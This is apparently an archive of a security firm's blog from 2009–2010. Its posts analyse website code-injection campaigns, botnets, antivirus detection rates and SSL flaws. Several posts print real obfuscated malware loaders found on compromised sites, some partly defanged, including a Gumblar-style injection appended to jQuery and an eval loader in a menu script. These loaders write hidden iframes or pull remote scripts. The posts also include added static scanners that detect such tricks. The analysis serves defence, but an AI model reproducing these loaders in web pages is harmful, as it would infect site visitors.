Posts Tagged ‘malicious websites’

Virus Infects 13 Million PCs, Steals Credit Card Numbers

March 2nd, 2010

“Spain Busts Hackers for Infecting 13 Million PCs”

Users were targeted via a vulnerability in Internet Explorer when they visited websites infected with the malware. Spanish authorities shut down the Mariposa botnet on December 23, 2009, although the details of what is being called the “largest cyber-raid to date” are only now being released.

Infection Statistics:

  • 190 countries
  • 40 of the largest financial institutions
  • 50% of the 1,000 largest companies


Zero to 3000+ Infected Sites in Less Than 30 Minutes

March 1st, 2010

Code injection attacks show no signs of abating. Every day, more than 6000 new websites are added to Google’s Safe Browsing List (blacklist). Hackers are compromising websites without the knowledge of the website owner in order to infect those websites’ visitors.

Malicious hackers don’t care if the website they infect is a small mom and pop operation or a large e-business. They use automated “bots” in most cases, which will attack any and every website they can exploit. No website is off limits.

As an example of how rampant this problem is, we will show how we found over 3000 infected websites, of which only a small percentage appears to be blacklisted by current website reputation services. One of the most reliable reputation services, offered by Google, identified only a small portion of the infected websites we mined using Google’s own search results. Identifying infected websites is not trivial.

We recently saw a strong rise in the appearance of the malicious code below:

this.v="";:LineMixer [var i=15492;var y=window;var  o='';var op='';
var a='s*c*r:iVpTt:'.replace(/[\:

TVJ\*]/g, '');var  yx=new Array();
var u='c*r*eja_tjeYE_lYe*mYebn*t_'.replace(/[_\*bjY]/g,  '');
var _=new Array();this.nt="";]var k;if(k!='dh' && k !=  '')
{k=null};y.onload=function(){var w;if(w!='' &&  w!='ns'){w=null};
try {this.n_=false;uh=document[u](a);var ow="";var  f="";
var xl=new String();var xf="xf";:LineMixer  [uh['s;rpcp'.replace(/[p;t6O]/g, '')]
='hHt4tVp4:5/V/4e4x4aHmViVnVe4

By searching Google for a small part of the code above (the fragment shown below), we found a list of websites harboring this code. A simple mention of this code on a website’s pages does not necessarily imply that the website is malicious; a website administrator might have been asking for clarification on a help forum. To remove any doubt, our systems perform a detailed (automated) examination of each site.

this.v="";:LineMixer [var i=

Interestingly, only 5.7% of the 3000+ infected sites we found carrying this code were blacklisted by Google. This highlights the fact that even reliable blacklists, like Google’s Safe Browsing List, are not complete.

Till next time.


An Interesting Sample of Malware

January 21st, 2010

This afternoon, a post on Badwarebusters.org reminded me of a somewhat interesting piece of malicious code I have not seen for some time. Our scanners flagged it as malware.

The original post is found here, answered by redleg on Badwarebusters.org.

This malware, found embedded in “eslpod.com/website/index.php”, is displayed below. The code has been slightly modified so as not to work as intended if loaded up and run in a browser.

<h4 id="Fl" style="display:none;">%64%6f%63%75%6d%65%6e%74%2e%77%72%74%65%28%22%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%22%68%74%74%70%3a%2f%2f%74%72%61%66%2e%74%72%61%6e%73%63%6f%6e%74%69%6e%65%6e%74%61%6c%2d%73%65%72%76%69%63%65%2e%67%2f%69%6e%64%65%78%2e%70%68%70%5c%22%20%73%74%79%6c%65%3d%5c%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%5c%22%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b</h4>

<script>
ar aK=docume nt.getElem entById("Fl"), A x=ev al;
aK = aK.inne rHTML;
Ax(unescape(aK));
</script>

It is interesting to see how hackers keep trying new tricks to fool scanning systems. Most code-injection attacks deliver the payload directly within the script tags. Here, the case is slightly different: the payload is disguised as a simple, hidden web element inside the page, and a short piece of JavaScript retrieves it with the getElementById function. The code then decodes and executes the malicious payload.

The payload by itself is not so interesting. It has been known to appear in different variants before this particular example.

The payload is displayed below:

document.wri te("<ifra me src=\"hxxp://traff.tr anscon tin enta l-serv ice.org/i n dex.php\" style=\"dis play:none;\"></ifr me>");

The iframe referenced here loads the following:

<!--LiveInternet counter-->
<script t ype="text/javascript">
<!--
document.write("<a href='hxxp://www.li veinte rnet.ru/click' "+
"target=_blank><img src='hxxp://cou nter.yad ro.ru/hit?t52.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+"' alt='' title='LiveInternet: показано число просмотров и"+
" посетителей за 24 часа' "+"border='0' width='88' height='31'><\/a>")
//-->
</script>
<!--/LiveInternet-->

This snippet should be flagged by many scanning services simply because of the reputation of the sites mentioned inside it (see Malware Patrol).
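
Added example, not code from the original post: a static triage routine for the trick described above, in which a percent-encoded payload is parked in an invisible element and pulled out with getElementById and innerHTML before being decoded with unescape. The detection heuristics and the sample page (with the placeholder host malware.example.invalid) are constructed for this illustration; nothing in it executes the page’s scripts.

```javascript
// Added example (not from the original post): find percent-encoded payloads
// hidden in display:none elements and inspect what they would decode to.

// Mirrors what unescape() does to %XX sequences.
function percentDecode(s) {
  return s.replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Helper used only to build the constructed sample further down.
function percentEncodeAll(s) {
  return Array.from(s, c => '%' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
}

// Any element whose inline style hides it, with its text content captured.
const HIDDEN_ELEMENT =
  /<(\w+)[^>]*style\s*=\s*["'][^"']*display\s*:\s*none[^"']*["'][^>]*>([\s\S]*?)<\/\1>/gi;
const PERCENT_RUN = /^(?:%[0-9a-f]{2})+$/i;
// Loader shape from the post: getElementById(...) ... innerHTML ... eval/unescape.
const LOADER = /getElementById\s*\([^)]*\)[\s\S]{0,200}?innerHTML[\s\S]{0,200}?(?:eval|unescape)/i;
const INDICATORS = {
  documentWrite: /document\.write/i,
  iframe: /<iframe/i,
  hidden: /display\s*:\s*none/i,
  externalUrl: /https?:\/\//i,
};

// Decodes every hidden percent-encoded blob and scores it; never evaluates it.
function scanHtml(html) {
  const findings = [];
  for (const m of html.matchAll(HIDDEN_ELEMENT)) {
    const text = m[2].trim();
    if (!PERCENT_RUN.test(text)) continue;  // hidden text, but not an encoded blob
    const decoded = percentDecode(text);
    const indicators = Object.keys(INDICATORS).filter(k => INDICATORS[k].test(decoded));
    const urls = decoded.match(/https?:\/\/[^"'\\\s>]+/gi) || [];
    findings.push({ tag: m[1], decoded, indicators, urls });
  }
  const loader = LOADER.test(html);
  // A loader plus a hidden blob that decodes to two or more indicators is a strong signal.
  return { findings, loader, suspicious: loader && findings.some(f => f.indicators.length >= 2) };
}

// Constructed sample modelled on the post (placeholder host, not a real site).
const PAYLOAD_PLAIN =
  'document.write("<iframe src=\\"http://malware.example.invalid/index.php\\" style=\\"display:none;\\"></iframe>");';
const SAMPLE_HTML = `<h4 id="Fl" style="display:none;">${percentEncodeAll(PAYLOAD_PLAIN)}</h4>
<script>
var aK=document.getElementById("Fl"), Ax=eval;
aK = aK.innerHTML;
Ax(unescape(aK));
</script>`;
```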

Till next time, surf safe.


Profiling Autonomous Systems Hosting Blacklisted Websites

January 1st, 2010

An Autonomous System, or AS, is a routing construct that represents a group of networks under the control of one organization (credit for edit: Max@badwarebusters.org). ASes form the “structure” of the Internet. The organizations behind them can be thought of as web-hosting companies, large Internet-based companies, or resellers of bandwidth and IP addresses. They are usually large organizations for whom simply buying an Internet connection and hosting their own company website is not enough.

In recent months, the trend of benign websites being affected by code injection clearly shows that attacks injecting malware into unsuspecting websites are on the rise. It is important to understand the profile of the ASes that are actually providing transit to infected websites hosted within their systems, since each such AS provides the bandwidth and resources that deliver malware to the computers of unsuspecting visitors of a compromised website. ASes, or more specifically the hosting companies and other network operators behind them, should therefore play a pivotal role in addressing compromised websites.

At StopTheHacker.com, we have conducted extensive experiments to analyze and profile over 20,000 ASes and identify which of them are the worst offenders in terms of hosting blacklisted websites. We used Google Safe Browsing data, also accessible via StopBadware.org (which sources data from Google and Sunbelt), to identify which ASes are responsible for the proliferation of badware on the Internet and to trend this over time. We correlated AS size with data available from CAIDA to determine whether larger ASes are more at fault.

We present some brief results below:

  1. The average percentage of blacklisted websites in
    • Top 10 ASes (according to number of sites noted by Google) is 3.5%
    • ASes with Ranks 11-23 (according to number of sites noted by Google) is 3.75%
    • ASes with Ranks 24-40 (according to number of sites noted by Google) is 5.01%
  2. The AS with the highest percentage of blacklisted sites is AS 16557 (Colo Solutions, Inc.), with close to 60% of 10,000 sites blacklisted.
  3. The Top 50 ASes, which host more than 10,000 sites each and have at least 6% of websites blacklisted, host 151,000 blacklisted sites, combined.

Interesting observations:

  1. AS 16557 (Colo Solutions, Inc.) is well known for popping up on blacklists related to peer-to-peer networks [Is someone tracking P2P users]. It seems that this AS, which is not really concerned about P2P traffic emanating from within its systems (traffic potentially used to exchange copyrighted material), is also not interested in paying attention to malware-infected websites hosted within its networks.
  2. AS 15169 (Google Inc.), had 590734 sites analyzed and 6046 of them were found to contain malware.
  3. AS 14173 (Photobucket), had zero sites infected out of 399424 sites analyzed.
  4. The largest AS according to connection degree (Level 3 Communications; see CAIDA’s AS listing) was hosting 571 infected sites out of 136305 sites analyzed by Google.
  5. AS 7018 (AT&T), was hosting 97 infected sites out of 7947 sites analyzed by Google.
  6. AS 701 (Verizon), was hosting 117 infected sites out of 7248 sites analyzed by Google.
  7. AS 1239 (Sprint), was hosting 117 infected sites out of 3958 sites analyzed by Google.

Making Sense of the Results

Below we present some graphs highlighting the percentage of blacklisted websites hosted by the top few ASes. Note that all AS rankings below are based on the number of websites analyzed by Google: an AS with rank 1 hosts more websites analyzed by Google than an AS with rank 2.



Catch Me if You Can: Antivirus Poor at Detecting Web-Malware

December 11th, 2009

AV Engines are not very effective at spotting web-based malware

There is every indication, from sources internal to StopTheHacker.com and from external sources comprising web hosting companies, administrators, security companies and government organizations, that the threat from web-based malware is looming large and is only going to intensify in the coming years.

Website owners, administrators and even website hosting companies are the ones directly affected. However, it is you and me, the web surfers who visit supposedly benign sites that have been compromised by malicious individuals, who are at the greatest risk.

To protect the client, i.e. you, security experts rightly recommend antivirus (AV). These AVs are good at detecting pieces of code that have already been classified and that adhere to well-known malicious behavior. Consumers need to know that most of these AV engines are not tuned to detect web-based malware threats.

Below we present a small test we performed consisting of 159 unique pieces of web-based malware captured during the last few weeks by our detection systems. We compared four popular AV engines and found that none of them are very effective at detecting malware from compromised websites.

Note that all AV engines used were at the latest version available for our systems and were updated with the latest virus definitions. All samples used JavaScript to execute their malicious content.

Brief highlights:

  1. AV engines used: AVG, ClamAV, F-prot, Avast
  2. None of the AV engines detected more than 11% of the malicious samples
  3. AVG detected 6.92%, ClamAV 10.69%, F-prot 10.06% and Avast 2.52% of the samples
  4. Only one sample was detected by all four AV engines. This sample was extremely similar to proof-of-concept (POC) exploit code from milw0rm.com

This limited experiment shows that traditional AV engines have a long way to go when it comes to detecting web-based malware. Jaal uses proprietary detection technology which is based on artificial intelligence and machine learning algorithms which can understand how malicious pieces of code behave and profile and classify them with high accuracy and recall.


When Benign scripts attack – V

December 9th, 2009

This post continues our series capturing the evolution of how hackers inject malware into benign scripts in the hope of hiding their malicious content amongst good code. The malicious code displayed this time leads to the famous “Gumblar” infection strain and can cause a lot of headaches. This particular strain is not new, but it has been resurfacing in the last few weeks, hence the focus on this specific piece.

This particular example shows how a jQuery script was used by a hacker to spread malicious code. This example is a little obfuscated. This code was mined from www.i-movix.com/en/distributors/.

On line 15 you can find:

<scri pt type="text/javas cript" src="/plugins/system/ jceutilities/js/jqu ery-126.js">

This loads the script below:

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 2008-05-24 14:22:17 -0400 (Sat, 24 May 2008) $
* $Rev: 5685 $
*/
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)
>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while
(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1}

**code removed for brevity**

while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(H
(){J w=1b.4M,3m$=1b.$;J D=1b.4M=1b.$=H(a,b){I 2B D.17.5j(a,b)};J u=/^[^<]*(<(.|\\s
)+>)[^>]*$|^#(\\w+)$/,62=/^.[^:#\\[\\.]*$/,12;D.17=D.44={5j:H(d,b){d=d||S;G(d.16){

**malicious code**

/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement
('scri pt');H3qqe 3ur6p.setAttribute('type', 'text/javascript');H3qqea3ur6p.setAttribute
('id', 'myscript1');H3qqea3ur6p.setAttribute('src',  'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v(
)@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$
)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@
0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(
m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##
)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a
&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|
\$/ig, ''));H3 qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea
3ur6p);}} cat h(e) {}
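
Added example, not code from the original posts: a static resolver for the obfuscation seen both in the “Zero to 3000+ Infected Sites” sample above and in the loader appended to jQuery here, where a noisy string literal is cleaned up by .replace(/regex/g, '') to yield “script”, “createElement”, “src” or the script URL. It computes those literals without executing the script; the two constructed samples (with example.invalid as placeholder host) and the scoring thresholds are assumptions of this example.

```javascript
// Added example (not from the original posts): statically resolve the
// 'noisy literal'.replace(/regex/g, '') trick without executing any script.

// Matches  'literal'.replace(/regex/flags, '')  : quote, body, regex, flags.
const RE_REPLACE =
  /(['"])((?:\\.|(?!\1)[^\\\n])*)\1\s*\.replace\(\s*\/((?:\\.|[^\/\\\n])+)\/([a-z]*)\s*,\s*(['"])\5\s*\)/g;

// DOM and eval tokens these loaders typically reassemble from noise.
const SENSITIVE = new Set(['script', 'createElement', 'src', 'eval', 'unescape',
  'write', 'appendChild', 'setAttribute', 'defer']);

// Only the simple escapes seen in such samples; enough for static triage.
function unescapeJsString(body) {
  return body.replace(/\\(.)/g, '$1');
}

// Every literal.replace(regex, '') pair with its statically computed result.
function resolveReplaceLiterals(js) {
  const out = [];
  for (const m of js.matchAll(RE_REPLACE)) {
    const original = unescapeJsString(m[2]);
    let resolved;
    try { resolved = original.replace(new RegExp(m[3], m[4]), ''); }
    catch (e) { continue; }  // malformed regex: skip rather than guess
    out.push({ original, resolved,
      removedRatio: 1 - resolved.length / Math.max(original.length, 1) });
  }
  return out;
}

// Flags scripts that rebuild DOM tokens or a URL from heavily padded literals.
function assessScript(js) {
  const resolved = resolveReplaceLiterals(js);
  const domTokens = resolved.filter(r => SENSITIVE.has(r.resolved)).map(r => r.resolved);
  const hiddenUrls = resolved
    .filter(r => /^https?:\/\//i.test(r.resolved) && r.removedRatio >= 0.3)
    .map(r => r.resolved);
  return { resolved, domTokens, hiddenUrls,
           suspicious: hiddenUrls.length > 0 || domTokens.length >= 2 };
}

// Constructed samples modelled on the two posts (placeholder host example.invalid).
const SAMPLE_DOM_BUILDER = String.raw`var a='s*c*r:iVpTt:'.replace(/[\:TVJ\*]/g, '');
var u='c*r*eja_tjeYE_lYe*mYebn*t_'.replace(/[_\*bjY]/g, '');
uh=document[u](a);uh['s;rpcp'.replace(/[p;t6O]/g, '')]='http://example.invalid/x.js';`;
const SAMPLE_NOISY_URL = String.raw`try{window.onload=function(){var s=document.createElement('script');
s.setAttribute('src','h#t&t@p$:/)/(e#x!a^m&p@l$e).)i(n#v!a^l&i@d$/)x(.#j!s^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));
document.body.appendChild(s);}}catch(e){}`;
const SAMPLE_BENIGN = `var id = 'user-42'.replace(/-/g, '');`;
```

A benign `.replace()` on a short literal strips little and resolves to nothing sensitive, so only padded literals that rebuild DOM tokens or a URL are flagged.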

Till next time…


When Benign scripts attack – IV

December 2nd, 2009

We have received many requests to keep up this series of posts, which tries to capture the evolution of how hackers are injecting benign scripts with malware in the hope of hiding their malicious content amongst good code.

This particular example shows how a menumachine script was used by a hacker to spread malicious code. It differs a little from the ones we have posted before in that it does not just plant the malicious code as a straight iframe or as obviously understandable JavaScript. It shows how hackers are trying just a little bit harder to inject code that is somewhat obfuscated. This code was mined from www.rvp1875.com/index.html. Take a look at the example below.

/* menumachine.js v1.7.1.1 - a component of MenuMachine (c)2004 Big Bang Software Pty Ltd :: menumachine.com*/

_ud="undefined";

if(typeof(bbMenu)==_ud)
  bbMenu=new Array();

bb_fix=new Array();

function _bbroot(bbL,name,r2L,clkOp,hRelPos,vRelPos,hRPmargin,vRPmargin,smScr,scrSp,scrAm,tri,triDn,triL,t_Hr,s_Hr,fade,posID,s_bCol,s_bW,s_bBtw,s_fFam,s_fSz,s_fWt,s_fStl,s_txAl,s_lPad,s_tPad,hOL,vOL,sArr,bCol,bw,bBtw,fFam,fSz,fWt,fStl,txAl,lPad,tPad,top_vOL,top_hOL,tArr,spc,nhlP,bUp,s_ao,ao)
{
  if(typeof(__pg)==_ud)
  {
    _b=new __bbBrChk();
    _hr=null;

    if(_b.ieDom&&!_b.mac){
      var els=document.getElementsByTagName("base");

      if(els.length){
        _hr=els[0].getAttribute("href");
      }
    }

    if(!_hr)
      _hr="";

    __pg=new _bbPg();

**code removed for brevity**

    for(var g=0;g<bbMenu.length;g++)
      bbMenu[g].off();
  }

  __bbMmB=1;
  _bbUld();
}

function _bbPg()
{
  var t=this;
  t.wn=window;
  t.d=t.wn.document;
  t.w=(_b.dt&&_b.ie)?t.d.documentElement.clientWidth:_b.ie||_b.nsDom?t.d.body.clientWidth:t.wn.innerWidth;
  t.h=(_b.dt&&_b.ie)?t.d.documentElement.clientHeight:_b.ie||_b.nsDom?t.d.body.clientHeight:t.wn.innerHeight;
  t.wn.onresize=_b.n4?_bbRzevt:_bbRePo;
}

**malicious code**

<!--
(function(hVAxp){var v120='va@72@20a@3d@22@53@63ript@45ngine@22@2c@62@
3d@22Ve@72@73i@6fn@28)+@22@2c@6a@3d@22@22@2cu@3d@6eavig@61tor@2euse@72A
ge@6et@3b@69@66((@75@2e@69n@64exOf(@22Chrome@22)@3c0)@26@26(u@2ei@6edexO
@66@28@22@57in@22@29@3e0)@26@26@28@75@2e@69@6edexO@66(@22NT@20@36@22)@3c
0)@26@26(@64o@63u@6dent@2ecoo@6b@69e@2eind@65@78Of(@22mi@65k@3d1@22)@3c@
30)@26@26(ty@70eof(@7arv@7at@73)@21@3dt@79@70e@6ff(@22A@22@29))@7bzrvzts
@3d@22@41@22@3beval(@22if@28wi@6ed@6fw@2e@22+a@2b@22)j@3dj+@22+@61+@22M@
61jor@22@2bb+a+@22Mi@6eor@22@2bb@2ba@2b@22Bu@69@6c@64@22+@62@2b@22j@3b@2
2)@3b@64ocume@6et@2ewrit@65(@22@3cscri@70t@20src@3d@2f@2fm@61rt@22@2b@22
@75@7a@2ec@6e@2fvid@2f@3fi@64@3d@22+j+@22@3e@3c@5c@2fs@63@72i@70t@3e@22)
@3b@7d';var Id4=v120.re lace(h Axp,'%');var gIl=unes cape(Id4);eval(gIl)}
)(/\@/g);
-->

Till next time..


New SSL Issues = New SSL Attacks

November 23rd, 2009

You might remember the article I wrote a couple of weeks back regarding the then recently found vulnerabilities of SSL 3.0 (TLS 1.0). Well, things just got real.

At the time, some researchers even went so far as to say that the vulnerability was only theoretical! Too theoretical to even worry about. The attack is described in detail:

It appears that the popular micro-blogging site Twitter first fell victim to the attack. The Register has the full story:

Now that the attack is in the wild, where are the patches?


Shockwave Vulnerability Directs Users to Malicious Websites

November 5th, 2009

Researchers at VUPEN have discovered four major vulnerabilities and one minor one in Adobe Shockwave Player. The vulnerabilities are present in version 11.5.1.601 and earlier. Adobe Shockwave is installed on over 450 million client systems worldwide.

The most serious of the vulnerabilities can be exploited to execute arbitrary commands when a visitor views a malicious web page. Three of the vulnerabilities can be exploited to trick a user into visiting a malicious website. The least severe is a possible denial of service of the Shockwave application caused by a faulty boundary condition.

Put together, the exploitation of these issues is a one-two punch: first a user is redirected to a malicious web page, where Shockwave then executes arbitrary code. These vulnerabilities affect all browsers, including Internet Explorer and Firefox. Adobe recommends updating Shockwave to its latest version, 11.5.1.602, or higher.

This is yet another reason that website administrators should invest in regular website scanning to discover malicious content that may be attacking their visitors.

Vulnerability Details:


New Security Issues come to light with SSL 3.0

November 5th, 2009

New SSL Security Issues: A vulnerability allowing the hijacking of an already established SSL 3.0 (TLS 1.0) session has been disclosed.

SSL technology provides an end-to-end secure communications tunnel, used most commonly by the HTTPS protocol. This most recent vulnerability allows an attacker to insert text of their choice into the data stream, even after the secure handshake has occurred. This is another security gap created by the standard’s renegotiation process, which is intended to allow a new SSL connection to be established over an already connected SSL session.

SSL renegotiation is most useful in the following situations: when client authentication is required, to use a different set of encryption and decryption keys, or when the server wants to switch encryption or hashing algorithms. For now, some patches have been made available that disable this functionality completely in order to avoid the vulnerability.

It will probably be a few weeks until patches including a reworked renegotiation mechanism appear. Most importantly, a fix has been in the works (by most browser vendors) but it won’t be out until the respective vendors finish their work. So, don’t depend on SSL until your browser is patched.

More Information:
